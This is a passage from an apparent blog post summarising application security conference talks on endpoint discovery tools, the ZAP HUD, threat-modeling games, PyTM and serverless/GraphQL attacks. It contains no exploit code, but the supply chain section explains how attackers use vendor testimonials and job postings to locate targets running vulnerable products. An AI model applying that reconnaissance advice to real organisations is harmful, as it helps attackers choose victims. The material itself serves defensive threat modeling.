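    return sum(x != y for x, y in zip(a, b))


def cluster(hashes, max_distance=2):
    """Greedily group names whose hash is within max_distance of a group's first member."""
    groups = []  # list of (representative_hash, [names])
    for name, h in hashes.items():
        for rep, members in groups:
            if hamming(rep, h) <= max_distance:
                members.append(name)
                break
        else:
            groups.append((h, [name]))
    return [members for _, members in groups]
```

In practice you'd first shrink each screenshot to a tiny grayscale thumbnail (say 8x8) with an imaging library and hash that. The payoff is the same as in the talk: a human reviews one representative per group instead of thousands of near-identical default pages.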

They scanned every web app on AWS Elastic Beanstalk and found many credentials, API keys and over 9GB of source code.

Elastic Beanstalk Loot

Read the full summary here.

The White Hat’s Advantage: Open-source OWASP tools to aid in penetration testing coverage

Vincent Hopson, Field Applications Engineer, CodeDx
abstract slides video

Vincent describes how two OWASP tools, Attack Surface Detector and Code Pulse, can make penetration testers more effective and demos using them.

These tools leverage the advantage that white hat penetration testers have over external attackers: they have access to server binaries/bytecode and the server-side source code.

White Hat Advantage: Typical Penetration Testing Workflow
A key part of assessing an application is determining its functionality and exposed endpoints.

Attack Surface Detector

Attack Surface Detector (ASD) performs static analysis on a web application’s source code to determine the endpoints it defines, including the paths, their expected HTTP verbs, and the names and types of parameters. It supports several languages and frameworks:

  • Java - JSPs, Servlets, Struts, Spring MVC
  • C# - ASP.NET MVC, Web Forms
  • Ruby - Rails
  • Python - Django

The value of ASD is in enabling testing, whether manual or automated, to be faster with better coverage.

  • When doing manual black box testing, it’s easy to miss endpoints if you’re time constrained. Also, there may be a legacy, insecure endpoint that is no longer used by the application but is still present and accessible if you know it’s there.
  • Getting high application functionality coverage is always a challenge for web app scanning tools (DAST), so by feeding in a set of known routes, better coverage can be achieved.

ASD has a plugin for both ZAP and Burp Suite, enabling easy ingestion of routes in JSON format.

White Hat Advantage: A screenshot of ASD
A screenshot of ASD within ZAP

See the summary for Endpoint Finder: A static analysis tool to find web endpoints for Olivier Arteau’s take on extracting routes from JavaScript code using their AST.

How Does It Actually Work?
Static analysis is a personal interest of mine, so I spent just a few minutes trying to determine how the routes are actually extracted. According to the attack-surface-detector-cli README, it uses ASTAM Correlator’s threadfix-ham module to determine the endpoints.

Some brief spelunking of ASTAM Correlator uncovers how they’re determining Rails routes - a custom lexer written in Java 😆. Here’s a snippet from RailsAbstractRoutesLexer.java (comments mine):

@Override
public void processToken(int type, int lineNumber, String stringValue) {
    
    if (type == '{') numOpenBrace++; // oh no
    if (type == '}') numOpenBrace--;
    if (type == '(') numOpenParen++;
    if (type == ')') numOpenParen--; // y u do this 2 me
    if (type == '[') numOpenBracket++;
    if (type == ']') numOpenBracket--;

    if (type == '#') {              // make it stahp
        isInComment = true;
    }
    // ...

I think lightweight static analysis on web apps is an interesting and useful direction to investigate, and I’m always a fan of people building more useful static analysis tools, but as I mentioned in my 2019 ShellCon presentation, you almost always don’t want to build your own lexer or parser. Languages are incredibly complex, have countless edge cases, and evolve over time. Instead, you want to leverage an existing parser for the language (like whitequark/parser) or a parser that can handle multiple languages, like GitHub’s semantic.

I would also argue that dynamic analysis is a better fit for extracting web app routes, due to how loops and other dynamic constructs can programmatically generate routes, but that’s a grump for another time…

Code Pulse

Alright, let’s take a look at Code Pulse, the second tool described and demo’d in this talk. Code Pulse is an interactive application security testing (IAST) tool (vendor description), which basically means that it hooks into an application’s runtime / instruments the bytecode to give you live, continuous understanding of the code paths that are being executed. Code Pulse currently supports Java and .NET applications.

This has a number of benefits, including:

  • App owner / security tester: which parts of the application are actually being exercised?
  • Security tester: Has my input reached a potentially vulnerable code location? In theory, an IAST can tell you this even if your specific input would not have exploited the issue.
  • Which tools or testers are getting the best coverage?

By having better insight into the running application, testing can again hopefully be faster and more effective.

White Hat Advantage: A screenshot of Code Pulse
A screenshot of Code Pulse. Different JARs, classes, and JSPs are represented by different blocks

Demo

The demo starts at 26:28, where Vincent shows how Attack Surface Detector can be used to extract the routes from WebGoat. These routes can then be imported into ZAP, causing its spidering to be more effective.

At 36:27, Vincent starts demoing Code Pulse by uploading the .war file for JPetStore, an open source Java Spring app. Code Pulse generates an inventory of all the contained code, runs Dependency-Check to look for out of date dependencies and Attack Surface Detector to extract endpoints, and instruments the web app’s bytecode to give you visibility into what code is running as you test.

Vincent shows how you can “start recording” in Code Pulse, log in to the application as one user and perform some actions, then record a new session with a different user. Code Pulse allows you to then easily visualize which code blocks were exercised by both sessions, as well as the code unique to one user.
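Conceptually, the two-session comparison is just set arithmetic over the code blocks each session touched. Here is a minimal sketch; Code Pulse does this visually in its UI, and the `compare_sessions` function and the method names in the example are hypothetical.

```python
def compare_sessions(session_a, session_b):
    """Split the code blocks touched by two recorded sessions into shared and unique sets."""
    a, b = set(session_a), set(session_b)
    return {"both": a & b, "only_a": a - b, "only_b": b - a}


# Hypothetical method names, standing in for what instrumentation would report.
admin_session = ["AccountController.login", "AdminController.deleteUser"]
user_session = ["AccountController.login", "CartController.addItem"]
overlap = compare_sessions(admin_session, user_session)
```

Anything in `only_a` for an admin session is a good candidate to replay with the regular user's credentials when hunting for access control bugs.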

Access Control Bug Heaven
This seems really useful for testing for access control bugs. I’d also recommend my friend Justin Moore’s Burp extension, AutoRepeater, which imho is the most powerful/flexible access control-related Burp extension.

Usable Security Tooling - Creating Accessible Security Testing with ZAP

David Scrobonia, Security Engineer, Segment
abstract slides video

In this talk, David gives an overview and demo of ZAP’s new heads-up display (HUD), an intuitive and awesome way to view OWASP ZAP info and use ZAP functionality from within your browser on the page you’re testing.

The Hero Security UX Needs

Security tools aren’t exactly known for having clean UIs or being intuitive to use. David took this as a personal challenge and ended up building a heads-up display (HUD) for OWASP ZAP, an intercepting proxy security testing tool.

The HUD allows you to view info from ZAP and use ZAP functionality from on the page you’re testing itself, without having to switch to a separate window or tool.

What’s an Intercepting Proxy?

An intercepting proxy is a tool commonly used by pen testers or security engineers to test web or mobile applications. The proxy sits between your browser and the web server you’re testing, allowing you to inspect, edit, and replay any HTTP request sent between your browser or device and the server.

ZAP HUD: Proxy Overview
The proxy (ZAP) sits between your browser and the web server
ZAP HUD: Proxy Overview
Typical security testing usage: browser on one side of your screen, proxy on the other

ZAP is an OWASP flagship project, is free and open source, and has been downloaded directly ~625,000 times and has had ~1M Docker image pulls.

ZAP User Stats

David presented some ZAP user stats I found interesting: ~40% of users have been in security for under 1 year and ~68% have been in security for under 3 years, and 45% of users are QA or developers.

ZAP HUD: ZAP User Roles

The Heads-up Display (HUD)

Taking inspiration from fighter jets, David decided to build a way for ZAP users to view the most relevant ZAP info in a concise way on the page that they’re testing.

At 7:52 David starts to do a live demo, but apparently there were insufficient sacrifices to the demo gods, so he falls back to several recorded demos at 10:44.

Features: The ZAP HUD allows you to easily view ZAP findings from within the browser (alert notifications pop up as issues are discovered and there are icons you can click to view all findings of a given severity), and you can perform actions like spidering the site, adding or removing the current page from scope, and starting an active scan by similarly clicking on an icon within your browser.

Other cool features include:

  • You can enable an option to auto-show and enable all hidden fields for every form, making it immediately evident what info the website is expecting and making it easy to supply arbitrary values.
  • If you don’t want to active scan an entire site, you can enable “attack mode” and ZAP will scan just the pages and endpoints you’re currently manually testing.

The ZAP HUD is also highly extensible, which is probably one of the most exciting and powerful parts of this. At 16:17 David shows a demo video of how you can customize the HUD to display whatever info you want, and add buttons to perform arbitrary actions.

Implementation Details

Rather than implementing the HUD via a browser extension, which may not be portable across browsers, the HUD instead works by having ZAP inject an additional JavaScript file include into loaded pages, which references a script hosted by ZAP that implements the HUD.

The HUD logic is encapsulated in a JavaScript closure so the page can’t modify it, and then the script modifies the page to add several iframes, corresponding to each of the Actions in the HUD on the right and left hand side of your browser window. Service workers are used to keep the HUD responsive when you’re intercepting requests and otherwise performing actions that would cause normal JavaScript on the page to die or reload.
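The injection step is something an intercepting proxy can do by rewriting HTML responses on the fly. Here is a rough sketch of the idea; this is not ZAP's actual code, and the script URL and the `inject_script` function are made up for illustration.

```python
import re

HUD_SCRIPT_URL = "https://zap/hud/inject.js"  # hypothetical URL, for illustration only


def inject_script(html: str, script_url: str = HUD_SCRIPT_URL) -> str:
    """Insert a <script> include just before </head>, or prepend it if there is no head."""
    tag = f'<script src="{script_url}"></script>'
    match = re.search(r"</head\s*>", html, flags=re.IGNORECASE)
    if match is None:
        return tag + html
    return html[: match.start()] + tag + html[match.start():]
```

A real implementation also has to deal with things like Content Security Policy headers and compressed responses, which this sketch ignores.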

ZAP HUD: ZAP User Roles

Who Can Use the HUD and Why

Developers can use the HUD to get early feedback on if their code has security bugs as they develop. It can enable them to see their app as an attacker would and provides hassle free browser integration.

Bug Bounty Hunters can use it to simplify their process, for example, by adding in new HUD tools for recon (e.g. BuiltWith, Wappalyzer, amass) and displaying notifications when there are changes to cookies, parameters, or local storage (giving visibility into what the app is doing). ZAP lets you configure how to log in as different users, so you could add a HUD tool to quickly switch between test users, making testing for access control issues much easier.

QA engineers can benefit from how it highlights attack surface (hidden fields, forms) and enables easy fuzzing and attacking of forms within the browser, without having to use external tools. In the future there could even be a Jira plugin for quick reporting that, with the click of a button, would create a Jira ticket with all of the relevant testing info autopopulated.

The Security Team could similarly benefit from a Jira plugin, and they could also define custom rules for an app (set various policy configs that all testers automatically pull in during testing) and configure global scan rules for your organization (e.g. perhaps there are certain issues you don’t care about, or there are org-specific issues you want to ensure are always tested).

References

David wrote an excellent, detailed blog post about the HUD (Hacking with a Heads Up Display) which includes links to a number of demo videos. He also presented about the ZAP HUD at AppSec USA 2018 (video).

David also referenced segmentio/netsec, a library that Segment open sourced that provides a decorator for the typical dial functions used to establish network connections, which can be configured to whitelist or blacklist certain IP network ranges. For example:

import (
    "net/http"
    "github.com/segmentio/netsec"
)

func init() {
    t := http.DefaultTransport.(*http.Transport)
    // Modifies the dial function used by the default http transport to deny
    // requests that would reach private IP addresses.
    t.DialContext = netsec.RestrictedDial(t.DialContext,
        netsec.Blacklist(netsec.PrivateIPNetworks),
    )
}



Threat Modeling

Game On! Adding Privacy to Threat Modeling

Adam Shostack, President, Shostack & Associates
Mark Vinkovits, Manager, AppSec, LogMeIn
abstract slides video

Adam Shostack and Mark Vinkovits describe the Elevation of Privilege card game, built to make learning and doing threat modelling fun, and how it’s been extended to include privacy.

Elevation of Privilege: Background

Adam originally created Elevation of Privilege at Microsoft as a fun and low barrier to entry way to teach threat modeling to junior security engineers and developers. While he’s proud of his book on threat modeling, it’s 600 pages, so not exactly something you hand someone who is just learning.

Adam was inspired by Laurie Williams’ Protection Poker game, which is an example of the increasingly popular “serious games” movement (Wikipedia): games designed for a primary purpose other than entertainment, used in industries like defense, education, scientific exploration, health care, emergency management, city planning, engineering, and politics.

Elevation of Privilege: Why a Game?

Games are powerful because:

  • They encourage flow: they can be challenging but not so hard that they cause anxiety.
  • They require participation: at some point it’s going to be your turn and you have to play, so you need to pay attention, but it passes focus in a way that isn’t aggressive or demanding.
  • They provide social permission for playful exploration and disagreement.
    • Games give us permission to act differently than we normally would in a meeting. Normally a junior security engineer might feel uncomfortable asking a senior developer if a given component might be insecure- “Well, this is just a game, so let’s hypothetically think about what it would mean if this was the case.”
    • This similarly makes disagreements less confrontational; instead they can be collaborative and playful.
  • They can be fun, which makes it much easier to get developers, QA, and others involved and invested.

Further, Elevation of Privilege produces real threat models, it’s not just a training game you play once and you’re done.

LogMeIn has used Elevation of Privilege for all threat modelling sessions for the past 2 years, and pretty much every time it’s used it calls out at least 2 - 3 high impact issues that had not previously been discovered. Mark gives an example of an issue it successfully drew out in a piece of code written by several experienced, principal-level developers.

Serious games are important for security. -Adam Shostack

Elevation of Privilege: How to Play

  1. Draw a picture of the new feature or system being discussed.
  2. Deal out all the cards.
  3. Play hands (once around the table), connecting the threats on a card to the diagram. Cards should stay in the current suit.
  4. Play through the deck or until you run out of time.
  5. The person appointed to take notes should document all potential issues discussed and create the relevant Jira tickets, discuss items with product managers to determine business relevance and impact, or whatever makes sense for the company and team.

Elevation of Privilege is inspired by Spades, in that you’re supposed to follow suit, higher numbers win, and trumps win over other cards.

Aces are for threats not listed on the cards, that is, you’ve invented a threat not in the deck.

You get 1 point for each threat and 1 point for winning the hand.
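The hand and scoring rules above are simple enough to sketch in a few lines. The data layout and function names here are my own, and the trump suit is an assumption on my part: this summary doesn't name it, but the published rules make Elevation of Privilege cards trump.

```python
TRUMP_SUIT = "Elevation of Privilege"  # assumption: not stated in this summary


def hand_winner(plays, lead_suit):
    """Pick the winner of one hand.

    plays: list of (player, suit, rank) in play order; rank is an int, higher wins.
    Trump cards beat everything else; otherwise the highest card in the lead suit wins.
    """
    trumps = [p for p in plays if p[1] == TRUMP_SUIT]
    candidates = trumps or [p for p in plays if p[1] == lead_suit]
    return max(candidates, key=lambda p: p[2])[0]


def score_hand(plays, lead_suit, threats_found):
    """1 point per threat a player tied to the diagram, plus 1 for winning the hand."""
    scores = {player: threats_found.get(player, 0) for player, _, _ in plays}
    scores[hand_winner(plays, lead_suit)] += 1
    return scores
```

Of course, the points are mostly there to keep people engaged; the real output of the game is the list of threats the note-taker writes down.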

Game On: Elevation of Privilege Tampering example
Cards are played on the parts of the diagram that they may apply to (Click to enlarge)

The card suits are from STRIDE, which is a mnemonic for Spoofing, Tampering, Repudiation, Info Disclosure, Denial of Service, and Elevation of Privilege.

An important thing to note is that the cards have been carefully written, through extensive user testing, to hint at what can go wrong in a way that’s accessible and intuitive to non-security professionals.

The Privacy Extension 

Extending Elevation of Privilege to include privacy followed the same process building any usable system should follow:

  1. Understand your users, the people you’re building for
  2. Understand their use cases
  3. Rapid prototype a solution - before putting months into it, sketch it out on a piece of paper
  4. Evaluate your solution based on user feedback and iterate.

Mark emphasized how critical it is to involve the end users as early as possible in the process. Otherwise, you’ll waste significant time building things they won’t want to use. This process is called user-centered design, user experience (UX), iterative design, etc.

Extensive User Testing
In creating Elevation of Privilege, Adam did a ton of usability studies on the hints, prototyped half a dozen different approaches, and watched how different people reacted to them. He spent a significant amount of time watching people struggle with what he had created so far, and noted the problems they had.

Mark took a number of the Jira issues resulting from some GDPR work they had already done at LogMeIn, abstracted the ideas, and then compiled a list of privacy-related topics that should be discussed during sprint planning.

He ended up building the privacy discussions into Elevation of Privilege itself by adding an additional “Privacy” suit. Here are a few examples:

Your system is not able to properly handle withdrawal of consent or objection to processing.

Your system is not following through on personal data deletion in integrated 3rd parties.

Personal data in your system is missing pointers to data subjects, hence the data is forgotten when the owner is deleted or makes a request for access.

OH HAI! Another Privacy Extension

After they’d already submitted this talk, they learned that several people from F-Secure had been working on another privacy extension of Elevation of Privilege, which is also open source on GitHub.

Their version extends the STRIDE model with TRIM:

  • Transport of personal data across geopolitical or contractual boundaries
  • Retention and Removal of personal data
  • Inference of personal data from other personal data, for example, through correlation
  • Minimisation of personal data and its use

References

You can get the Elevation of Privilege card deck for free (print it yourself) or have Agile Stationery put it on some nice sturdy cards for you. You can also see a transcript of this talk on Agile Stationery here.

Both the original and the privacy extension are freely available and licensed under Creative Commons. Get the original here, Mark’s privacy version here, and the F-Secure privacy version here.

Questions

Q: I love this idea, but how do I get people to agree to play a game in a meeting?

Adam generally asked people, “Give me 15 minutes of your time where you suspend your sense of disbelief. We’ll play a bit, and then after 15 minutes, we’ll decide if it’s not working.” He gives many trainings, and has always found it to work.

Q: As the AppSec person, do you act as moderator or do you participate as well?

Adam generally tries to read the room: do I have people who need some coaching and help, or do I have people who will be engaged by the competition and try to beat the game’s creator? He’ll then adjust his style to be collaborative or cutthroat as appropriate. He prefers to be collaborative, get people engaged, and he’ll just act as a coach.

Mark has found that when he doesn’t deal cards to himself, it conveys to the developers that this isn’t just going to be some AppSec person telling them what to do; it’s going to be a process where they take ownership, are self-directed, and find out for themselves what they need to do.

Offensive Threat Models Against the Supply Chain

Tony UcedaVelez, CEO, VerSprite
abstract slides video

In this talk, Tony discusses the economic and geopolitical impacts of supply chain attacks, a walkthrough of supply chain threat modeling from a manufacturer’s perspective, and tips and best practices in threat modeling your supply chain.

Tony is the author of Risk Centric Threat Modeling: Process for Attack Simulation and Threat Analysis, Wiley, 2015.

A Holistic View of Threat Modeling Supply Chains
To me, the most unique and valuable aspect of this talk is its holistic view of threat modeling a company and ecosystem.

This includes all of the potential threat actors and their motivations, the geopolitical risks that may be involved, physical and network risks as well as software risks, leveraging threat intel (what types of attacks are other companies in my industry facing?), other breaches (if I’m a provider for a government agency and there was a breach of another government agency or provider, how does that leaked info, PII, and IP affect my company and my customers?), CVEs in your products and your dependencies, and more.

Supply Chain Threat Model - Overview
In this talk, Tony focuses on manufacturing: companies who assemble products using components from various sources.

2017 saw a dramatic rise in supply chain attacks, a 200% increase over previous years. A typical attack costs a business $1.1 million.

General Motives and Probabilistic Analysis

When you’re constructing a threat model, it’s important to consider the threat motives of the attacker: their intent, the reward they’ll get from a successful attack, and if they can repudiate the attack.

You can then do a probabilistic analysis based on the access required to do the attack, the risk aversion of the attacker, and their capabilities.

Impact Considerations

The impact of a supply chain attack can include:

  • Financial loss - lost sales, charges run up by criminals using enterprise resources billed to the company, increased insurance premiums, fines/penalties for unreported breaches, costs of upgrading security, etc.
  • Time loss - Businesses estimate it takes over 60 hours to respond to a software supply chain attack.
  • Cargo loss - oftentimes 3-5 times the value of the cargo, all told, because of opportunity cost of replacement, disruption to schedules, etc.
  • Associated losses (corporate) - Loss of customer trust/reputational harm, loss of market share/market cap.
  • National security - Threats when the targets are strategic assets (mail service, power grids, trains/roads).
  • Human life / societal loss - Could result in deaths if people can’t reach 911 or other vital resources can’t be dispatched to emergencies.

Clarifying Expectations
It’s important to clarify points of view and priorities with your stakeholders, the people who are sponsoring the threat modeling. This helps you communicate your results at the end of it in language and terms that are meaningful to them.

Supply Chain Threat Library & Motives

A “threat library” consists of threats to a business, including: disruption, framing a person or company, sabotage, extortion, espionage, data exfiltration, stealing intellectual property, and accessing sensitive data.

An attacker’s “threat motives” can include: lulz, practicing for another target, misdirection (blame an adversary), reducing the target’s credibility, revenge, financial gain, obtaining intel, leveraging data for its value, shortening product development cycles, leveraging PII for impersonation, and OSINT.

Supply Chain Threat Model - Risk Graph
Note that due to the interrelated nature of supply chains and society, supply chain attacks can result in socioeconomic instability (e.g. attacking food production, payment systems, etc.)

Also, if you can interrupt supply of a good or service, you can affect pricing through a supply chain hack, so there are certainly incentives for orchestrated attacks.

How to Threat Model Your Supply Chain

  1. Look at risks for your company that have high likelihood, based on your company and industry (what attacks have your company and similar companies faced?).
  2. Determine which parts of your attack surface are relevant to the threat(s).
  3. Identify vulnerabilities/weaknesses that live within this attack surface.
  4. Build a threat library based upon attackers’ likely motives.
  5. Build an attack library that realizes the motives in your threat library.
  6. Determine the success of these attack patterns via security research or manual pen testing.

Threat Modelling USPS

Tony walks through threat modelling the U.S. Postal Service (USPS), including several of the large sorting devices they use. See slides 13 - 18 for more details.

Supply Chain Threat Model - USPS

You can’t cover every attack, so focus on the ones that are most likely based on evidence and data.

Supply Chain Threat Model - Attack Tree
Tony believes attack trees are more useful than data flow diagrams (DFDs) for threat modeling, as they make potential attack paths concrete.

Given these attack trees, you can then do a probabilistic analysis of the viability of each path. For example, if many of the vulns relate to denial-of-service, and the attacker’s goal is to cost the company money, then these paths could enable an attacker to realize that goal.
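
To make the idea of ranking attack paths concrete, here is a minimal Python sketch. It is not from Tony's slides: the tree, the step names, and the likelihood numbers are all made up for illustration, and it assumes steps are independent so that a path's likelihood is simply the product of its steps.

```python
from dataclasses import dataclass, field
from math import prod
from typing import List


@dataclass
class AttackStep:
    """One node in an attack tree: a step plus the steps that can follow it."""
    name: str
    likelihood: float  # assumed estimate in [0, 1], ideally backed by incident data
    children: List["AttackStep"] = field(default_factory=list)


def enumerate_paths(node, prefix=()):
    """Yield every root-to-leaf path as a tuple of AttackStep objects."""
    path = prefix + (node,)
    if not node.children:
        yield path
        return
    for child in node.children:
        yield from enumerate_paths(child, path)


def path_likelihood(path):
    """Simplifying assumption: steps are independent, so multiply them."""
    return prod(step.likelihood for step in path)


# Hypothetical tree; every name and number here is illustrative only.
root = AttackStep("Disrupt mail sorting", 1.0, [
    AttackStep("Phish maintenance vendor", 0.5, [
        AttackStep("Push malicious firmware update", 0.2),
    ]),
    AttackStep("Reach sorter management interface", 0.25, [
        AttackStep("Exploit denial-of-service bug", 0.5),
    ]),
])

# Rank paths so the most plausible ones get tested first.
ranked = sorted(enumerate_paths(root), key=path_likelihood, reverse=True)
for path in ranked:
    print(f"{path_likelihood(path):.3f}  " + " -> ".join(s.name for s in path))
```

The ranking is only as good as the estimates fed into it, which is why the talk stresses grounding them in evidence about attacks that have actually occurred.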

The Danger of Testimonials
One clever OSINT vector Tony points out is testimonials, the brief blurbs businesses have on their sites in which customers promote a product.

If you have developed exploits for a given hardware or software provider, you can use testimonials to determine who uses the vulnerable product. If you’re targeting a specific company, you can review the websites of product companies who tend to serve the target’s vertical to see which vendors and potentially even the specific products the target company uses.

Job postings can similarly reveal the technologies and products a company uses.

Supply Chain Threat Model - Automation
Examining the trust boundaries between layers, components, and supply chain providers. Getting in to the control level is great for repudiation.

Probability = event / outcome

What events have actually occurred in the threat model you’re building, and what were their outcomes?

Attack Surface as a Service

Similar to aggregating compromised PII into a marketplace, there are already marketplaces for companies’ vulnerabilities and attack surfaces - the people they employ and their roles, the software the company uses, their domains/IPs/etc. Government groups and private hacker syndicates for hire are the most mature in this area.

Supply Chain Threat Model - Overall Process
The overall process from end to end

Threat Model Every Story: Practical Continuous Threat Modeling Work for Your Team

Izar Tarandach, Lead Product Security Architect, Autodesk
abstract slides video

Izar describes the attributes required by threat modelling approaches in order to succeed in Agile dev environments, how to build an organization that continuously threat models new stories, how to educate devs and raise security awareness, and PyTM, a tool that lets you express TMs via Python code and output data flow diagrams, sequence diagrams, and reports.

Threat Modeling Goals

According to Izar, threat modelling is:

A conceptual exercise that aims to identify security-related flaws in the design of a system and identify modifications or activities that will mitigate those flaws.

In traditional waterfall development processes, there could be a large threat modelling session performed upfront during the design phase, which would accurately model the system to be built. With Agile, this approach is no longer effective.

Izar determined the following goals he needed from a TM approach for it to be effective at Autodesk:

  • Accessible: can a product team do it independently after a brief period of instruction? Can they keep doing it?
  • Scalable: can the same thing be done over many teams and products? In a short time?
  • Educational: can it teach instead of correct?
  • Useful: are the results found useful for both product and security?
  • Agile: is it repeatable, does it negatively impact the product team’s velocity?
  • Representative: how does the system being modeled compare with the model?
  • Unconstrained: once the “known suspects” are evaluated, is the team led to explore further?

Existing Approaches Didn’t Cut It

Izar ranked several current approaches against these goal criteria and found they were all lacking in some respect: not being scalable (requiring SMEs), being too heavy-weight, overly constraining the process (discouraging participants from imagining other threats), and more.

TM Every Story: Comparing Approaches

Continuous TMing: How to Threat Model Every Story

  1. Build a baseline, involving everyone.
    • Use whatever technique works for your team, it doesn’t have to be perfect.
  2. Designate one or more “threat model curators,” who will be responsible for maintaining the canonical threat model document and the findings queue.
    • These people don’t have to be tech leads, they just need to mind the queue and make sure issues get the appropriate attention.
  3. Have devs evaluate every story: “Does this have any security relevance?”
    • If not, continue as usual. If it does, either address the issue and document it as a mitigated finding, or add it as a “threat model candidate finding” for the curator to review.
    • At Autodesk, they track these via labels on Jira tickets.
  4. Make sure your curators are on top of the TM finding and candidate finding queues.
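
The per-story decision in step 3 can be sketched in a few lines of Python. This is only an illustration of the flow described above: the label names, the `Story` fields, and the `CuratorQueue` type are hypothetical, since the talk only says that Autodesk tracks findings via labels on Jira tickets.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import List, Optional


class Label(Enum):
    # Hypothetical label names, not Autodesk's actual Jira labels.
    NOT_RELEVANT = "no-security-relevance"
    MITIGATED = "tm-finding-mitigated"
    CANDIDATE = "tm-candidate-finding"


@dataclass
class Story:
    key: str
    security_relevant: bool
    mitigation: Optional[str] = None  # set when the dev already addressed the issue


@dataclass
class CuratorQueue:
    """The two queues the threat model curator keeps an eye on."""
    findings: List[Story] = field(default_factory=list)
    candidates: List[Story] = field(default_factory=list)


def triage(story: Story, queue: CuratorQueue) -> Label:
    """Apply the 'does this have any security relevance?' decision to one story."""
    if not story.security_relevant:
        return Label.NOT_RELEVANT          # continue as usual
    if story.mitigation:
        queue.findings.append(story)       # documented as a mitigated finding
        return Label.MITIGATED
    queue.candidates.append(story)         # left for the curator to review
    return Label.CANDIDATE
```

For example, `triage(Story("APP-3", True), queue)` would return `Label.CANDIDATE` and leave the story in `queue.candidates` for the curator.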

How do Devs Know What has Security Relevance?

Here Izar takes inspiration from Richard Feynman, who said to teach principles, not formulas.

Do your own homework. To truly use first principles, don’t rely on experts or previous work. Approach new problems with the mindset of a novice. Truly understand the fundamental data, assumptions and reasoning yourself. Be curious. -Richard Feynman

So they created a Continuous Threat Modeling Handbook that lists the functional areas security will generally care about (e.g. authentication, authorization, crypto, etc.) as well as a Secure Developer Checklist - Continuous Threat Modeling that can be used by devs to verify that the principles have been followed at implementation time.

TM Every Story: Sample Questions
Example topics that are security-relevant

We are training our developers wrong. We are providing huge amounts of information that do not correspond to huge amounts of useability. We are doing the busywork of teaching people how the RSA algorithm works without focusing on the aspects of choosing the right key length, algorithm and secret protection scheme that their system needs.

Principles Checklist

Autodesk’s principles checklist follows an “if this then that” model - devs only need to review the items relevant to what they’re currently working on.

TM Every Story: Checklist
Example items from the checklist

Importantly, all of the descriptions are written in terms devs understand, rather than security jargon, so they can easily determine if an item is relevant.

The checklist is small, ideally no more than one double sided printed page so it can be printed and kept at hand.

The “then that” side is not prescriptive. It pushes the developer to search for info relevant to the environment or framework they’re using. This is done on purpose to keep the list short, make it somewhat open-ended, and tickle most devs’ innate curiosity. The checklist gives pointers but not “absolute solutions.”

The checklist is backed by further documentation and live support by the security team.

Limitations

Izar has found that a primary challenge is convincing dev teams that the Subject List is not a threat library and that the Checklist is not a requirements list: these are starting points, not an exhaustive list.

Following this process won’t yield perfect TMs, and that’s ok - it’s a process that evolves over time. As long as the TM is better than it was before, that’s valuable progress.

An SME or security team is still necessary for education, and, as with anything, the resulting TM is only as good as the quality of the data informing it.

Current TM Approaches

Some tools start with a questionnaire (“What do you want to build?”) and generate a list of requirements that the developers must follow. Others get a description of the system and generate threats based on characteristics of the design.

But developers write code, why not let them define a threat model in code?

3 “Threat Model as Code” Approaches

ThreatSpec by Fraser Scott is threat modeling IN code: as code is written, the threat model is described in comments inline with the code. For example:

// @accepts arbitrary file writes to WebApp:FileSystem with
//   filename restrictions
// @mitigates WebApp:FileSystem against unauthorised access 
//   with strict file permissions
func (p *Page) save() error {
    filename := p.Title + ".txt"
    return ioutil.WriteFile(filename, p.Body, 0600)
}

ThreatPlaybook by Abhay Bhargav is threat modeling FROM code: deriving previously identified threats from other tools, validating or discovering those threats present in code, and providing a proper language to talk about these threats. You build a library of threats, run your tools, and marry findings with the threats you built before. Abhay discussed ThreatPlaybook in his AppSec Cali 2018 talk Robots with Pentest Recipes.

Here’s a video demo of running ThreatPlaybook, and an example repo. Abuse cases are listed in YAML, for example:

login_user:
  description: |
    As an employee of the organization,
    I would like to login to the Customer API and manage Customer Information
  abuse_cases:
    external_attacker_account_takeover:
      description: As an external attacker, I would compromise a single/multiple user accounts to gain access to sensitive customer information
      threat_scenarios:
        sql injection user account access:
          description: External Attacker may be able to gain access to user accounts by successfully performing SQL Injection Attacks against some of the unauthenticated API Endpoints in the application
          severity: 3
          cwe: 89
          cases:
            - sql_injection_auto
            - generic_error_messages
            - database_hardening_check

PyTM by Izar and a few friends, is threat modeling WITH code; using code to express the system to be modeled.

PyTM – Creating a Threat Model

In PyTM, you create a threat model in Python code, describing the relevant boundaries, actors, and servers using Python objects.

from pytm.pytm import (TM, Server, Datastore, Dataflow,
                       Boundary, Actor, Lambda)

tm = TM("my test tm")
tm.description = "another test tm"

User_Web = Boundary("User/Web")
Web_DB = Boundary("Web/DB")
VPC = Boundary("AWS VPC")

user = Actor("User")
user.inBoundary = User_Web

web = Server("Web Server")
web.OS = "CloudOS"
web.isHardened = True

my_lambda = Lambda("cleanDBevery6hours")
my_lambda.hasAccessControl = True
my_lambda.inBoundary = Web_DB

tm.process()

Once the threat model has been defined, PyTM can be used to generate data flow diagrams, sequence diagrams, or a report.

PyTM – how is it being used?

Currently Autodesk is using PyTM during team meetings to create an initial TM diagram.

It facilitates discussions and rapid iteration with product teams, as you can easily review the generated diagrams: “is it missing this attribute?”, “why is this a threat?”, “what if… ?”

PyTM allows you to keep threat models in version control, together with the code they describe, and you can generate automated, standard threat model reports.

Is keeping these TM files up to date feasible?
I love all of these properties, but you still have the fundamental challenge of keeping these TM files up to date with the architecture and current feature set of the code, which seems like it’d be a burden on dev teams or at least hard to maintain at scale. I’d be curious to hear Izar’s thoughts on the successes and challenges of this approach after a year or two.



Web Security

An Attacker’s View of Serverless and GraphQL Apps

Abhay Bhargav, CTO, we45
abstract slides video source code

An overview of functions-as-a-service (FaaS) and GraphQL, relevant security considerations and attacks, and a number of demos.

What is Functions-as-a-Service (FaaS)?

FaaS enables developers to write standalone, single purpose functions that are triggered by events (e.g. HTTP requests, an upload to S3, text message to your messaging gateway). When the function runs, a container/VM executes the task and then freezes post execution and gets killed.

Serverless is a natural extension of the progression from monolith applications, to microservices, to simply single purpose functions, the smallest individual unit of compute.

FaaS are short lived, they have no ports (you’re accessing them through an API gateway, the function is not handling the network communication itself), and have no state.

The FaaS lifecycle is:

  • Containers/MicroVMs are “thawed” when they are invoked again
  • Additional containers are spawned to scale based on concurrent invocations
  • When a function is invoked, a container is launched to run it and is destroyed afterwards.

Note: some serverless deployment managers may give your function more permissions than it needs.

What is GraphQL?

GraphQL is an API query language that enables the client to query and mutate exactly what is wanted; for example, multiple resources or only certain attributes of one resource can be read or modified in a single request.

Usually there’s only a single endpoint to query and insert (mutate) data for the API, and GraphQL implementations support pubsub functionality for realtime data. Example NodeJS Express GraphQL server:

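const express = require('express');
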